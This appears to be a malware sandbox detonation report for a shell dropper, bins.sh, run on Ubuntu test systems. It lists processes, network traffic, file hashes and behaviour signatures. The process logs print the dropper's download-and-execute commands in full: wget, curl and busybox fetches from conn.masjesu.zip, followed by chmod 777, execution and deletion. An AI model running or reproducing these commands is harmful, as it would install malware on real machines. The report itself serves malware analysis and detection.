[/bin/busybox wget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/bin/chmod

[chmod 777 D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p

[./D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/bin/rm

[rm D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/bin/chmod

[chmod 777 tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf

[./tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/bin/rm

[rm tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/bin/chmod

[chmod 777 lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O

[./lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/bin/rm

[rm lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp

Files

/tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral6

Detonation Overview

Submitted

2024-12-16 04:16

Reported

2024-12-16 04:52

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

599s

Max time network

481s

Command Line

[/tmp/bins.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A

Processes

/tmp/bins.sh

[/tmp/bins.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/bin/chmod

[chmod 777 YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA

[./YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/bin/rm

[rm YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 151.101.193.91:443 tcp
GB 89.187.167.8:443 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.61:443 tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
GB 185.125.190.49:80 connectivity-check.ubuntu.com tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
GB 185.125.190.49:80 connectivity-check.ubuntu.com tcp

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-12-16 04:16

Reported

2024-12-16 04:52

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

13s

Max time network

564s

Command Line

[/tmp/bins.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA N/A
N/A /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX N/A
N/A /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht N/A
N/A /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO N/A
N/A /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O N/A
N/A /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj N/A
N/A /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p N/A
N/A /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf N/A
N/A /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE N/A
N/A /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J N/A
N/A /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 N/A
N/A /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ N/A
N/A /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen N/A
N/A /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ N/A
N/A /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J N/A
N/A /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 N/A
N/A /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE N/A
N/A /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen N/A
N/A /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ N/A
N/A /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ N/A
N/A /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX N/A
N/A /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht N/A
N/A /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO N/A
N/A /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA N/A
N/A /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj N/A
N/A /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p N/A
N/A /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf N/A
N/A /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX /usr/bin/curl N/A
File opened for modification /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O /usr/bin/curl N/A
File opened for modification /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ /usr/bin/curl N/A
File opened for modification /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE /usr/bin/curl N/A
File opened for modification /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX /usr/bin/curl N/A
File opened for modification /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj /usr/bin/curl N/A
File opened for modification /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA /usr/bin/curl N/A
File opened for modification /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE /usr/bin/curl N/A
File opened for modification /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J /usr/bin/curl N/A
File opened for modification /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ /usr/bin/curl N/A
File opened for modification /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO /usr/bin/curl N/A
File opened for modification /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj /usr/bin/curl N/A
File opened for modification /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p /usr/bin/curl N/A
File opened for modification /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen /usr/bin/curl N/A
File opened for modification /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ /usr/bin/curl N/A
File opened for modification /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 /usr/bin/curl N/A
File opened for modification /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ /usr/bin/curl N/A
File opened for modification /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht /usr/bin/curl N/A
File opened for modification /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA /usr/bin/curl N/A
File opened for modification /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf /usr/bin/curl N/A
File opened for modification /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O /usr/bin/curl N/A
File opened for modification /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf /usr/bin/curl N/A
File opened for modification /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen /usr/bin/curl N/A
File opened for modification /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 /usr/bin/curl N/A
File opened for modification /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht /usr/bin/curl N/A
File opened for modification /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J /usr/bin/curl N/A
File opened for modification /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO /usr/bin/curl N/A
File opened for modification /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p /usr/bin/curl N/A

cURL User-Agent

Description Indicator Process Target
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A

Processes

/tmp/bins.sh

[/tmp/bins.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/usr/bin/chmod

[chmod 777 YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA

[./YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/usr/bin/rm

[rm YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/usr/bin/chmod

[chmod 777 CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

